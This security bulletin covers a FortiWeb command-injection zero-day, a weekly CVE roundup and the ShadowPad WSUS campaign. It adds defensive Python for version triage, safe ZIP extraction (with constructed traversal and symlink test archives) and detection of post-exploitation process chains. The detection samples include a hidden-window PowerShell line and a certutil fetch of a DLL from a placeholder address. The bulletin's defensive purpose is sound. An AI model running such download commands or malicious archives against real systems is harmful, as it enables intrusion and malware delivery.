Fortinet warns of new FortiWeb zero-day exploited in attacks

Severity: MEDIUM (CVE-2025-58034)

CVSS v3.0 score: 6.7

Information
 
FortiWeb is Fortinet's Web Application Firewall (WAF), designed to protect web applications and APIs from attacks such as cross-site scripting (XSS), SQL injection, bot activity, distributed denial of service (DDoS) and other online threats.

Incident

  The vulnerability CVE-2025-58034, reported by Trend Micro's Trend Research team, is an OS command injection flaw (CWE-78) that allows an authenticated attacker to execute commands on the underlying operating system through specially crafted HTTP requests or CLI commands.

  The flaw is considered relatively easy to exploit and does not require user interaction, although it does require valid credentials. Trend Micro also stated that more than 2,000 attack attempts have been detected so far.

  This development comes days after Fortinet confirmed that it had silently patched another critical FortiWeb vulnerability (CVE-2025-64446, CVSS score: 9.1) in version 8.0.2. Fortinet has not said whether the two sets of exploitation activity are linked, but Orange Cyberdefense said it observed "several exploitation campaigns" chaining the two bugs: CVE-2025-64446 provides the authentication bypass, and CVE-2025-58034 then provides the command injection, so the credential requirement of the newer flaw is no real barrier on an unpatched appliance.

Recommendation

  Upgrade affected FortiWeb releases to a fixed version:

  • FortiWeb 8.0.0 through 8.0.1 (upgrade to 8.0.2 or above)
  • FortiWeb 7.6.0 through 7.6.5 (upgrade to 7.6.6 or above)
  • FortiWeb 7.4.0 through 7.4.10 (upgrade to 7.4.11 or above)
  • FortiWeb 7.2.0 through 7.2.11 (upgrade to 7.2.12 or above)
  • FortiWeb 7.0.0 through 7.0.11 (upgrade to 7.0.12 or above)

  Because the flaw is reachable through HTTP requests and the CLI, and is being chained with an authentication bypass, also restrict administrative access to FortiWeb (HTTP/HTTPS management and SSH) to trusted networks, and review admin accounts, configuration changes and logs on any appliance that ran an affected version while exposed.
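The following is an added example, not code from Fortinet or from this bulletin, showing how to run an appliance inventory against the affected ranges listed above so that each host gets a verdict and a target release. The version strings, hostnames and the shape of the inventory are constructed for illustration; the version-string format assumed here ("FortiWeb-VM 7.4.3,build1234(GA)") is only an assumption, and the parser simply takes the first x.y.z it finds.

```python
import re

# Affected ranges and first fixed release per FortiWeb branch, taken from the
# upgrade list above: (first affected, last affected, first fixed).
AFFECTED_RANGES = {
    (8, 0): ((8, 0, 0), (8, 0, 1), (8, 0, 2)),
    (7, 6): ((7, 6, 0), (7, 6, 5), (7, 6, 6)),
    (7, 4): ((7, 4, 0), (7, 4, 10), (7, 4, 11)),
    (7, 2): ((7, 2, 0), (7, 2, 11), (7, 2, 12)),
    (7, 0): ((7, 0, 0), (7, 0, 11), (7, 0, 12)),
}

_VERSION_RE = re.compile(r"\b(\d+)\.(\d+)\.(\d+)\b")


def parse_version(text):
    """Pull the first x.y.z version out of a free-form string such as
    'FortiWeb-VM 7.4.3,build1234(GA)' (assumed format). Returns ints or None."""
    match = _VERSION_RE.search(text)
    return tuple(int(part) for part in match.groups()) if match else None


def assess(version_text):
    """Classify one version string.

    status is one of:
      'vulnerable'      - inside a listed affected range; upgrade_to gives the fix
      'fixed'           - on a listed branch, at or above the fixed release
      'unlisted-branch' - branch not in the list above (e.g. older trains);
                          check the vendor advisory rather than assuming safe
      'unparsed'        - no x.y.z version found in the input
    """
    version = parse_version(version_text)
    if version is None:
        return {"version": None, "status": "unparsed", "upgrade_to": None}
    branch = AFFECTED_RANGES.get(version[:2])
    if branch is None:
        return {"version": version, "status": "unlisted-branch", "upgrade_to": None}
    first, last, fixed = branch
    if first <= version <= last:
        return {"version": version, "status": "vulnerable", "upgrade_to": fixed}
    return {"version": version, "status": "fixed", "upgrade_to": None}


def triage(inventory):
    """inventory: iterable of (hostname, version string).
    Returns (hostname, status, upgrade_to) rows, vulnerable hosts first."""
    rows = []
    for host, text in inventory:
        result = assess(text)
        fix = ".".join(map(str, result["upgrade_to"])) if result["upgrade_to"] else ""
        rows.append((host, result["status"], fix))
    rows.sort(key=lambda row: (row[1] != "vulnerable", row[0]))
    return rows


# Constructed sample inventory (hypothetical hostnames and versions).
SAMPLE_INVENTORY = [
    ("waf-dc1-01", "FortiWeb-VM 7.4.10,build1234(GA)"),
    ("waf-dc1-02", "FortiWeb-VM 7.4.11,build1250(GA)"),
    ("waf-dmz-01", "FortiWeb-1000E 8.0.1,build0070(GA)"),
    ("waf-lab-01", "FortiWeb-VM 6.4.3,build0900(GA)"),
    ("waf-old-01", "version unknown"),
]

if __name__ == "__main__":
    for host, status, fix in triage(SAMPLE_INVENTORY):
        print(f"{host:12} {status:16} {fix}")
```

A branch that is not in the list (the 6.4.3 host above) is reported as "unlisted-branch" rather than "fixed" on purpose: the bulletin only lists the branches Fortinet named, and an appliance on an unlisted train needs a look at the vendor advisory, not a green tick.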

Security systems matter: keep monitoring them as usual.
For more information please contact
Email: sales@inetms.co.th
065 149 2822 (Ms. Suphatson)
063 204 4534 (Ms. Atsamaphorn)
065 929 6330 (Ms. Kansinee)
061 387 9439 (Ms. Sirilak)
092 257 6902 (Ms. Narusorn)
063 197 7510 (Mr. Yanotai)
065 725 7405 (Ms. Nattharini)

Weekly Interesting CVE

Each entry lists: CVE name; published date; last update; device/application/OS target; attack type; CVSS severity rating; detail; solution; reference.

1. CVE-2025-64310
   Published: 21/11/2025   Last update: 21/11/2025
   Target: EPSON WebConfig and Epson Web Control for SEIKO EPSON projector products
   Attack type: Improper Restriction of Excessive Authentication Attempts
   CVSS: 9.8
   Detail: The affected software does not properly limit the number of login attempts, so an attacker can brute-force the administrative user's password and gain administrative access to the device.
   Solution: Update to the latest firmware version.
   Reference: https://jvn.jp/en/vu/JVNVU95021911/

2. CVE-2025-65108
   Published: 21/11/2025   Last update: 21/11/2025
   Target: md-to-pdf, versions prior to 5.2.5
   Attack type: Code Injection
   CVSS: 10.0
   Detail: In the md-to-pdf CLI tool before version 5.2.5, a Markdown front-matter block that uses the JavaScript delimiter is handed to the JS engine of the gray-matter library, which executes the attacker-supplied code inside the md-to-pdf converter process. Any Markdown file from an untrusted source is therefore a code-execution vector.
   Solution: Update to version 5.2.5 or later.
   Reference: https://github.com/simonhaenisch/md-to-pdf/security/advisories/GHSA-547r-qmjm-8hvw

3. CVE-2025-64755
   Published: 21/11/2025   Last update: 21/11/2025
   Target: @anthropic-ai/claude-code, versions prior to 2.0.31
   Attack type: OS Command Injection
   CVSS: 8.7
   Detail: An error in how the Claude Code package parses sed commands lets a crafted command pass the read-only validation, allowing an attacker to write to arbitrary files on the host system.
   Solution: Update the package to version 2.0.31 or later.
   Reference: https://github.com/anthropics/claude-code/security/advisories/GHSA-7mv8-j34q-vp7q

4. CVE-2025-12170
   Published: 21/11/2025   Last update: 21/11/2025
   Target: Checkbox plugin for WordPress, versions prior to 2.8.10
   Attack type: Missing Authorization
   CVSS: 5.3
   Detail: An AJAX endpoint lacks an authorization check, so an unauthenticated attacker can call it to clear log files, causing an unauthorized loss of log data.
   Solution: Update to version 2.8.10 or later.
   Reference: https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/checkbox/checkbox-2810-missing-authorization-to-unauthenticated-log-clearing

5. CVE-2025-11001
   Published: 19/11/2025   Last update: 24/11/2025
   Target: 7-Zip
   Attack type: Remote Code Execution
   CVSS: 7.0
   Detail: 7-Zip ZIP file parsing directory traversal remote code execution vulnerability. Crafted paths in a ZIP archive can make 7-Zip write files outside the intended extraction directory, which remote attackers can use to execute arbitrary code on affected installations. User interaction is required: the victim must process a crafted archive, and the exact vector depends on how 7-Zip is used.
   Solution: Update to version 25.00 or later.
   Reference: https://www.zerodayinitiative.com/advisories/ZDI-25-949
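Entry 5 is the archive-extraction traversal class of bug. As an added example (not 7-Zip's code, and not taken from the ZDI advisory), the block below shows the checks an extractor needs before writing any member to disk: reject absolute names, reject any ".." path component, reject symbolic-link members, and confirm the resolved path still lies under the destination. It is written for Python's zipfile module; the three sample archives are built in memory and are constructed test data, not real exploit files.

```python
import io
import os
import stat
import tempfile
import zipfile


class UnsafeZipEntry(Exception):
    """A ZIP member that must never be written to disk."""


def vet_entry(info, dest):
    """Return the absolute output path for ZIP member `info` under `dest`,
    or raise UnsafeZipEntry.

    Rejects: absolute names (Unix or drive-letter), any '..' path component,
    symbolic-link members (Unix mode in the high 16 bits of external_attr, as
    written by Unix archivers), and anything whose resolved path escapes `dest`.
    """
    name = info.filename.replace("\\", "/")
    parts = name.split("/")
    if name.startswith("/") or (len(parts[0]) == 2 and parts[0][1] == ":"):
        raise UnsafeZipEntry("absolute path: %r" % info.filename)
    if ".." in parts:
        raise UnsafeZipEntry("parent-directory traversal: %r" % info.filename)
    if stat.S_ISLNK(info.external_attr >> 16):
        raise UnsafeZipEntry("symbolic link member: %r" % info.filename)
    dest_abs = os.path.realpath(dest)
    target = os.path.realpath(os.path.join(dest_abs, *parts))
    if os.path.commonpath([dest_abs, target]) != dest_abs:
        raise UnsafeZipEntry("resolves outside destination: %r" % info.filename)
    return target


def audit_archive(zip_bytes):
    """List (member name, reason) for every member that fails vetting."""
    root = os.path.join(tempfile.gettempdir(), "zip-audit-root")  # never written to
    problems = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            try:
                vet_entry(info, root)
            except UnsafeZipEntry as exc:
                problems.append((info.filename, str(exc)))
    return problems


def safe_extract(zip_bytes, dest):
    """Fail closed: vet every member before writing anything, then extract.
    Returns the written file paths relative to dest, in POSIX form."""
    written = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        plan = [(info, vet_entry(info, dest)) for info in zf.infolist()]
        for info, target in plan:
            if info.is_dir():
                os.makedirs(target, exist_ok=True)
                continue
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with zf.open(info) as src, open(target, "wb") as dst:
                dst.write(src.read())
            rel = os.path.relpath(target, os.path.realpath(dest))
            written.append(rel.replace(os.sep, "/"))
    return written


def try_extract(zip_bytes):
    """Extract into a fresh temporary directory.
    Returns (True, written_paths) or (False, reason) when vetting rejects a member."""
    try:
        return True, safe_extract(zip_bytes, tempfile.mkdtemp(prefix="safezip-"))
    except UnsafeZipEntry as exc:
        return False, str(exc)


def _build(members):
    """Build an in-memory ZIP from (name, data, unix_mode) tuples. Test data only."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data, mode in members:
            zi = zipfile.ZipInfo(name)
            zi.create_system = 3              # 3 = Unix: external_attr carries st_mode
            zi.external_attr = mode << 16
            zf.writestr(zi, data)
    return buf.getvalue()


# Constructed sample archives; none of these is a real exploit file.
BENIGN_ZIP = _build([("docs/readme.txt", b"hello", stat.S_IFREG | 0o644)])
TRAVERSAL_ZIP = _build([("../../outside.txt", b"x", stat.S_IFREG | 0o644)])
SYMLINK_ZIP = _build([
    ("link", b"../../..", stat.S_IFLNK | 0o777),          # link pointing above dest
    ("link/payload.txt", b"x", stat.S_IFREG | 0o644),     # written through the link
])

if __name__ == "__main__":
    for label, blob in [("benign", BENIGN_ZIP), ("traversal", TRAVERSAL_ZIP), ("symlink", SYMLINK_ZIP)]:
        print(label, audit_archive(blob), try_extract(blob))
```

The symlink case is the one that a plain ".." filter misses: the first member is harmless on its own, and only the second member, written through it, lands outside the destination. Vetting every member before writing any of them is what keeps the extractor from leaving a half-written archive behind when a later member fails.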


Malware News or Campaign IOC/IOA | EN

Each entry lists: campaign name; detection date; attack type; description; mitigation/remediation; reference.

1. ShadowPad Malware Actively Exploits WSUS Vulnerability for Full System Access
   Detection date: 24/11/2025
   Attack type: Remote Code Execution
   Description: Attackers are reportedly exploiting a critical vulnerability in Windows Server Update Services (WSUS) to distribute the ShadowPad malware. The activity follows the public release of a proof-of-concept (PoC) exploit for the flaw, tracked as CVE-2025-59287, which lets an attacker execute arbitrary code on an unpatched WSUS server and take complete control of it. After compromise, the attackers use PowerShell to control the machine and then download ShadowPad with tools such as certutil and curl. ShadowPad is a sophisticated backdoor built to evade detection and stay hidden on the host; it uses DLL side-loading to disguise itself as a legitimate file. The malware is linked to state-sponsored groups and is commonly used against large organizations, particularly critical infrastructure. Experts warn that attack volume has risen rapidly since the PoC was released and is expected to keep rising unless organizations patch their WSUS servers promptly.
   Mitigation/Remediation:
   • Apply Microsoft's security update for CVE-2025-59287 to every WSUS server. Where patching must wait, Microsoft's published workarounds are to disable the WSUS Server Role or to block inbound traffic to ports 8530 and 8531 on the host firewall; both take WSUS out of service for clients.
   • Check WSUS hosts for PowerShell, certutil or curl launched from the WSUS service, and for unexpected DLLs placed beside legitimate signed executables (the DLL side-loading pattern described above).
   • Avoid clicking on suspicious links or downloading software from untrusted sources.
   • Conduct regular security awareness training for all employees.
   Reference: https://thehackernews.com/2025/11/shadowpad-malware-actively-exploits.html
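The post-exploitation chain described in this entry (WSUS server process spawning PowerShell, then certutil or curl fetching the payload) is detectable from ordinary process-creation telemetry. The block below is an added example written for this bulletin, not code from The Hacker News or from any vendor: it runs two rules over a list of process-creation events and correlates them per host. The names of the WSUS host processes (WsusService.exe and the IIS worker w3wp.exe) are assumptions to adjust for your environment, and the sample events, hostnames, PIDs and the 203.0.113.10 address (a TEST-NET-3 documentation address) are constructed, not real indicators.

```python
from datetime import datetime

# Assumed names for the processes that host WSUS (the WSUS service and the
# IIS worker that serves its web endpoints); adjust to your environment.
WSUS_PARENTS = {"wsusservice.exe", "w3wp.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
DOWNLOADERS = {"certutil.exe", "curl.exe"}


def basename(path):
    """Case-folded file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def is_download(image, cmdline):
    """True for certutil URL-cache fetches and curl fetches of http(s) URLs."""
    exe, cmd = basename(image), cmdline.lower()
    if exe == "certutil.exe":
        return "urlcache" in cmd and "http" in cmd
    if exe == "curl.exe":
        return "http://" in cmd or "https://" in cmd
    return False


def analyze(events, window_seconds=300):
    """Run two rules over process-creation events (dicts with ts, host, pid,
    ppid, parent_image, image, cmdline), processed oldest first.

    Rule 1: a shell whose parent is a WSUS host process, or whose parent was
            itself flagged (so the whole process tree is followed), is 'high'.
    Rule 2: certutil/curl fetching a URL is 'medium' on its own and 'critical'
            when it follows a Rule-1 hit on the same host within the window.
    """
    findings = []
    flagged = {}            # host -> {pid: timestamp} of Rule-1 processes
    for e in sorted(events, key=lambda ev: ev["ts"]):
        ts = datetime.fromisoformat(e["ts"])
        host_flags = flagged.setdefault(e["host"], {})
        exe, parent = basename(e["image"]), basename(e["parent_image"])
        if exe in SHELLS and (parent in WSUS_PARENTS or e["ppid"] in host_flags):
            host_flags[e["pid"]] = ts
            findings.append({"severity": "high", "rule": "wsus_spawned_shell",
                             "host": e["host"], "pid": e["pid"], "cmdline": e["cmdline"]})
        elif exe in DOWNLOADERS and is_download(e["image"], e["cmdline"]):
            recent = any(0 <= (ts - t).total_seconds() <= window_seconds
                         for t in host_flags.values())
            findings.append({"severity": "critical" if recent else "medium",
                             "rule": "download_tool_after_wsus_shell" if recent else "download_tool",
                             "host": e["host"], "pid": e["pid"], "cmdline": e["cmdline"]})
    return findings


# Constructed sample events (hypothetical hosts, PIDs and a TEST-NET-3 address);
# they illustrate the chain described above and are not real IOCs.
SAMPLE_EVENTS = [
    {"ts": "2025-11-24T08:59:00", "host": "wsus01", "pid": 2200, "ppid": 700,
     "parent_image": r"C:\Windows\System32\services.exe",
     "image": r"C:\Program Files\Update Services\Service\WsusService.exe",
     "cmdline": "WsusService.exe"},
    {"ts": "2025-11-24T09:00:00", "host": "wsus01", "pid": 4100, "ppid": 2200,
     "parent_image": r"C:\Program Files\Update Services\Service\WsusService.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c powershell -nop -w hidden -ep bypass"},
    {"ts": "2025-11-24T09:00:02", "host": "wsus01", "pid": 4120, "ppid": 4100,
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -nop -w hidden -ep bypass"},
    {"ts": "2025-11-24T09:00:35", "host": "wsus01", "pid": 4150, "ppid": 4120,
     "parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil.exe -urlcache -split -f http://203.0.113.10/svc.dll C:\ProgramData\svc.dll"},
    {"ts": "2025-11-24T09:05:00", "host": "fs01", "pid": 900, "ppid": 880,
     "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe"},
    {"ts": "2025-11-24T09:06:00", "host": "fs01", "pid": 950, "ppid": 900,
     "parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\System32\curl.exe",
     "cmdline": "curl.exe -o tools.zip https://example.org/tools.zip"},
]

if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f["severity"], f["rule"], f["host"], f["pid"], f["cmdline"])
```

Following the process tree by PID (Rule 1 accepts a parent that was itself flagged) matters because the shell that actually runs certutil is usually two hops below the WSUS service, not its direct child; the time window on Rule 2 is what turns a curl download that an administrator might run legitimately on a file server into a critical finding only when it appears on a host where the WSUS service has just spawned a shell.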

02 December 2025